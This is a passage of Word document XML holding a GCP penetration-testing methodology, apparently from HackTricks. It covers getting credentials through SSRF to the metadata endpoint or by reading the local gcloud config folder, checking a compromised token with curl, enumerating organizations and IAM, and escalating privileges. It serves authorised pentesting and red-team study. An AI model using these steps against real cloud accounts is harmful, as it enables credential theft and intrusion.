      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> reuse (password leaks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8C8BF" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Vulnerabilities in GCP-Hosted Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A1E4E" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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99" w:history="1">
        <w:proofErr w:type="gramStart"/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Server Side</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/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 Request Forgery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with access to metadata endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651964C9" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Local File Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C53AE" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="2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HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>/home/USERNAME/.config/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gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762F9D4" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="2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HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>C:\Users\USERNAME\.config\gcloud\*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16F5A8" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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3rd parties </w:t>
      </w:r>
      <w:proofErr w:type="gram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breached</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4ADB1E59" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532820E3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Or by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compromising an unauthenticated service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4582752A" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId100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 - Unauthenticated Enum &amp; Access</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38D597C9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Or if you are doing a </w:t>
      </w:r>
      <w:proofErr w:type="gram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review</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you could just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ask for credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with these roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CD774" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId101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 - Permissions for a Pentest</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54526A63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After you have managed to obtain credentials, you need to know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to who do those creds belong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, and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what they have access to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, so you need to perform some basic enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C82B82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Basic Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A085F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SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FFEF2" w14:textId="18BB8160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For more information about how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enumerate GCP metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> check the following page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C49355" w14:textId="62205244" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId102" w:anchor="6440" w:history="1"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Cloud SSRF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="685502D0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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2059C4B9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GCP you can try several options to try to guess who you are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDCBAE9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64FB3DFB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#If you are inside a compromise machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585AF03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list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4497BDFD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curl -H "Content-Type: application/x-www-form-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urlencoded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 -d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access_token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=$(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print-access-token)" https://www.googleapis.com/oauth2/v1/tokeninfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6059B9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print-identity-token #Get info from the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token</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="675EB44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7369F6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#If you compromised a metadata token or somehow found an OAuth token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458DC7D9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curl -H "Content-Type: application/x-www-form-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urlencoded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 -d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access_token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=&lt;token&gt;" https://www.googleapis.com/oauth2/v1/tokeninfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B38A7B8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Org Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77874084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AC2FFC4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Get organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DAC6C3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organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508086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resource-manager folders list --organization &lt;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org_number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&gt; # Get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folders</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5036F790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projects list # Get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projects</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="67C4264D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Principals &amp; IAM Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE53C0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have enough permissions,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checking the privileges of each entity inside the GCP account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> will help you understand what you and other identities can do and how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escalate privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFEFA7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don't have enough permissions to enumerate IAM, you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steal brute-force them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to figure them out. Check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how to do the numeration and brute-forcing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF999BB" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId103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 - IAM, Principals &amp; Org Policies Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="288B8063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Now that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have some information about your credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and if you are a red team hopefully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haven't been detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">). It's time to figure out which services are being used in the environment. In the following section you can check some ways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enumerate some common services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC92D8F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Services Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E58763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GCP has an astonishing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>amount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of services, in the following page you will find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basic information, enumeration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cheatsheets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, how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avoid detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, obtain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persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, and other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post-exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> tricks about some of them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87C2E6" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId104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 - Services</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="654CB48A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Note that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don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> need to perform all the work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manually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, below in this post you can find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section about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:anchor="automatic-tools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automatic tools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4AB6FACF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Moreover, in this stage you might discovered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more services exposed to unauthenticated users,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you might be able to exploit them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0A785" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId106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 - Unauthenticated Enum &amp; Access</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41E78EBB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Privilege Escalation, Post Exploitation &amp; Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B679C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most common way once you have obtained some cloud credentials or have compromised some service running inside a cloud is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abuse misconfigured privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the compromised account may have. So, the first thing you should do is to enumerate your privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA2B70C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Moreover, during this enumeration, remember that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permissions can be set at the highest level of "Organization"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79550612" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId107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GCP - Privilege </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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Escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId108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</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 - Post </w:t>
        </w:r>
        <w:proofErr w:type="spellStart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Exploitation</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId109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</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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 - Persistence</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DD6E204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Publicly Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A9887F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While enumerating GCP services you might have found some of them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exposing elements to the Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VM/Containers ports, databases or queue services, snapshots or buckets...). As </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">/red teamer you should always check if you can find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sensitive information / vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> on them as they might provide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further access into the AWS account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE65032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In this book you should find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information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> about how to find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exposed GCP services and how to check them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. About how to find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vulnerabilities in exposed network services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> I would recommend you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">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search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the specific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service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F62C3" w14:textId="63BC91FF" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="wps">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771A380C" wp14:editId="28BC8810">
                  <wp:extent cx="304800" cy="304800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="7" name="Rectangle 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4F5D3A1" id="Rectangle 7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proofErr w:type="spellStart"/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HackTricks</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="text-xs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HackTricks</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="589C8916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GCP &lt;--&gt; Workspace Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843FE51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Compromising</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> principals in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one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> platform might allow an attacker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compromise the other one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, check it in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33801D6D" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId111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 &lt;--&gt; Workspace Pivoting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54F5BAAF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Automatic Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207AE7A" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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the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console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, in </w:t>
      </w:r>
      <w:hyperlink r:id="rId112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https://console.cloud.google.com/iam-admin/asset-inventory/dashboard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can see resources and IAMs being used by project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD7588" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/>
        <w:numPr>
          <w:ilvl w:val="1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Here you can see the assets supported by this API: </w:t>
      </w:r>
      <w:hyperlink r:id="rId113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https://cloud.google.com/asset-inventory/docs/supported-asset-types</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E52BBF3" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Check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tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be </w:t>
      </w:r>
      <w:hyperlink r:id="rId114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used in several clouds here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67010F13" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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115" w:history="1">
        <w:proofErr w:type="spellStart"/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gcp_scanner</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is a GCP resource scanner that can help determine what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level of access certain credentials </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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posses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> on GCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC35C7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1F97E006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Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079F9A8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git clone https://github.com/google/gcp_scanner.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026B73B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cd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gcp_scanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F4299C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virtualenv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-p python3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venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69125BE2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source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venv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/bin/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activate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="005BCFF0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pip install -r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requirements.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D44CDB4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Execute with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creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33944FFB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python3 __main__.py -o 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tmp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/output/ -g "$HOME/.config/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD0D06" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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116" w:history="1">
        <w:proofErr w:type="spellStart"/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gcp_enum</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: Bash script to enumerate a GCP environment using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
